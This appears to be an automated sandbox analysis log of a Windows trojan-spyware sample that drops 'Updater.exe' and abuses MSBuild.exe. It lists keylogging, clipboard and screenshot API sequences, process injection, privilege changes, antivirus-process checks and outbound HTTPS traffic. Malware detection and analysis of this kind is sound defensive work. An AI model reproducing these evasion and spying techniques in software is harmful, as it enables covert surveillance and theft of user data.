Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 35_2_00B9F664
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 35_2_00B9F8D3
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 35_2_00B9F664
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 36_2_004359B7
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 35_2_00B8AA95
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BB9FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 35_2_00BB9FB4
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: Updater.exe PID: 7592, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01406DB1 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject, 35_2_01406DB1
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A239 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 35_2_0140A239
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E3CB: CreateFileW,DeviceIoControl,CloseHandle, 35_2_00B8E3CB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_00B8230F
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 35_2_00B8F76E
Detected potential crypto function
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B27070 35_2_00B27070
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B33AD9 35_2_00B33AD9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B5E32F 35_2_00B5E32F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B424CA 35_2_00B424CA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B56599 35_2_00B56599
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BAC844 35_2_00BAC844
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B429E3 35_2_00B429E3
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B4C9C0 35_2_00B4C9C0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3CBF0 35_2_00B3CBF0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B56C09 35_2_00B56C09
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B92D81 35_2_00B92D81
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B2CE20 35_2_00B2CE20
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B2EE00 35_2_00B2EE00
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B42F23 35_2_00B42F23
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3F0DA 35_2_00B3F0DA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B89168 35_2_00B89168
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BB525A 35_2_00BB525A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3D37F 35_2_00B3D37F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B47746 35_2_00B47746
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B47975 35_2_00B47975
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B41964 35_2_00B41964
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B47BD2 35_2_00B47BD2
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B2DC70 35_2_00B2DC70
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B59D1E 35_2_00B59D1E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B41FC1 35_2_00B41FC1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B8A 35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B91 35_2_01409B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004100C5 36_2_004100C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042509D 36_2_0042509D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00410130 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043A2E0 36_2_0043A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041D5AF 36_2_0041D5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00444620 36_2_00444620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042A6D0 36_2_0042A6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00426800 36_2_00426800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040F970 36_2_0040F970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043A97E 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042EB60 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00401000 36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00410118 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004431D0 36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004331DE 36_2_004331DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004291E0 36_2_004291E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004241E0 36_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00442EB0 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040F250 36_2_0040F250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040B260 36_2_0040B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040A270 36_2_0040A270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043E230 36_2_0043E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004432C0 36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004012D5 36_2_004012D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041E298 36_2_0041E298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00401328 36_2_00401328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042C3E0 36_2_0042C3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00442380 36_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004433B0 36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042F4DD 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00429494 36_2_00429494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004094BF 36_2_004094BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041F510 36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004255A4 36_2_004255A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004335B0 36_2_004335B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042D642 36_2_0042D642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042762D 36_2_0042762D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004386FE 36_2_004386FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004226A0 36_2_004226A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042762D 36_2_0042762D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040D760 36_2_0040D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00441720 36_2_00441720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00443720 36_2_00443720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040A730 36_2_0040A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00429494 36_2_00429494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042B7D9 36_2_0042B7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042B7FE 36_2_0042B7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00442850 36_2_00442850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041482A 36_2_0041482A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004038E0 36_2_004038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00439940 36_2_00439940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00407960 36_2_00407960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00444920 36_2_00444920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00431980 36_2_00431980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042AA40 36_2_0042AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042CA72 36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00420A24 36_2_00420A24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00421B40 36_2_00421B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040DB20 36_2_0040DB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00415BD8 36_2_00415BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00439BA0 36_2_00439BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00414BBF 36_2_00414BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00444C50 36_2_00444C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00434C60 36_2_00434C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042AC04 36_2_0042AC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043EC20 36_2_0043EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040ECC0 36_2_0040ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00427CD2 36_2_00427CD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041ECDE 36_2_0041ECDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040BD70 36_2_0040BD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00429D00 36_2_00429D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040ADD0 36_2_0040ADD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00432D80 36_2_00432D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00408DA0 36_2_00408DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00422E50 36_2_00422E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00416E10 36_2_00416E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042BE10 36_2_0042BE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00442EB0 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00406F60 36_2_00406F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00428F00 36_2_00428F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00408DA0 36_2_00408DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00426F82 36_2_00426F82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00434F80 36_2_00434F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00441F80 36_2_00441F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00409F9C 36_2_00409F9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00404FA0 36_2_00404FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00409FA8 36_2_00409FA8
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0041C2A0 appears 176 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040C8C0 appears 71 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B2FA3B appears 33 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B4488E appears 34 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B41000 appears 41 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B4014F appears 40 times
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
PE file contains more sections than normal
Source: file.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: file.tmp.2.dr Static PE information: Number of sections : 11 > 10
Source: file.exe Static PE information: Number of sections : 11 > 10
PE file does not import any functions
Source: is-EUGF2.tmp.3.dr Static PE information: No import functions for PE file found
Source: is-5MQFH.tmp.3.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.1677553862.000000007FB6A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000003.1676905528.000000000337E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000000.1675519930.0000000001059000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe Binary or memory string: OriginalFileName vs file.exe
Source: file.exe Binary or memory string: OriginalFileName vs file.exe
Source: file.exe Binary or memory string: \OriginalFileName vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamewebpconverter.exeP vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@60/28@1/2
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B94573 GetLastError,FormatMessageW, 35_2_00B94573
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B821C9 AdjustTokenPrivileges,CloseHandle, 35_2_00B821C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B827D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 35_2_00B827D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B95D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 35_2_00B95D7E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle, 35_2_00B8E2AB
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B88056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode, 35_2_00B88056
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B93DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 35_2_00B93DBD
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\hangbird Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: file.exe String found in binary or memory: /LOADINF="filename"
Source: file.exe String found in binary or memory: ] [json.exception.parse errorparse_error, column at line invalid_iteratortype_errorout_of_rangeother_errorSeIncreaseQuotaPrivilege" \bin\EnableVROverlay_x64.exe -dt -nvft -spmon -excludelist_file "\ExcludeList.overlay.txt" \bin\PresentMon_x64.exe -timed -terminate_after_timed -hotkey SCROLLLOCK -output_file "\FrameView.csv" -frameview -multi_csv -stop_existing_session -session_name FrameViewService -dont_restart_as_admin \ExcludeList.txt" -exclude dwm.exe -session_name -spawnprovider -spawnconsumer -terminate_existing signaturedb\NVIDIA Corporation\FrameViewSDK\downloader\mouseLut.json\..\bin\mouseLut.json\bin\nvrla.exe -e \bin{}{
Source: file.exe String found in binary or memory: FrameView SDK service-uninstallFvSvc-service-testservice-install-startRSA1
Source: file.exe String found in binary or memory: FrameView SDK service-uninstallFvSvc-service-testservice-install-startRSA1
Source: file.exe String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: file.exe String found in binary or memory: application/vnd.groove-help
Source: file.exe String found in binary or memory: "application/x-install-instructions
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe"
